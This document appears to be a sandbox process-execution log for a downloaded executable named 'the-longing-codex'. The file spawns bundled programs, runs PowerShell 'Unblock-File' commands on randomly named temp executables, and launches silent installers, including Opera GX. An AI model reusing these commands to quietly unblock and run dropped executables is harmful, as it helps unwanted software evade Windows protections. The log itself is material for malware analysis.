"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4576 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4476 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7072 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=6096 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2848 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6256 /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4248 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7732 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1
C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe
"C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe"
C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp" /SL4 $305FA "C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe" 6384938 52224
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "bom_mix_pro_11151"
C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
"C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe" e6bb0bd45a3f81f477172f8405ad4523
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2152
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"
C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe
C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe /sid=3 /pid=224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2256
C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe
C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2248
C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp" /SL5="$40710,5432480,721408,C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2232
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause player_blu_ray_11143
C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe
"C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe" -i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2404 -ip 2404
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause player_blu_ray_11143
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2248
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1456
C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe
C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2268
C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --silent --allusers=0 --server-tracking-blob=MzQ1OTdjOTNlMjc4YzMxYTlhNjYxNDg2NDVjYjkzMjI4YTJmM2RkYjg3ODE5YzdiYjJhN2Y5MzQyOWI5ODlkNjp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOiJvcGVyYV9neCIsInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yLz91dG1fc291cmNlPU9GVCZ1dG1fbWVkaXVtPXBiJnV0bV9jYW1wYWlnbj1vZ3gmJnV0bV9jb250ZW50PTM1MzE4IiwidGltZXN0YW1wIjoiMTczMTY0MjkxNC4yNDgwIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib2d4IiwiY29udGVudCI6IjM1MzE4IiwibWVkaXVtIjoicGIiLCJzb3VyY2UiOiJPRlQifSwidXVpZCI6IjQwZTg2MDRkLWE0NDAtNDhkZS1iMTNmLTY0OTUzMmFlMTZiMiJ9
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2300
C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x70318c5c,0x70318c68,0x70318c74
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version
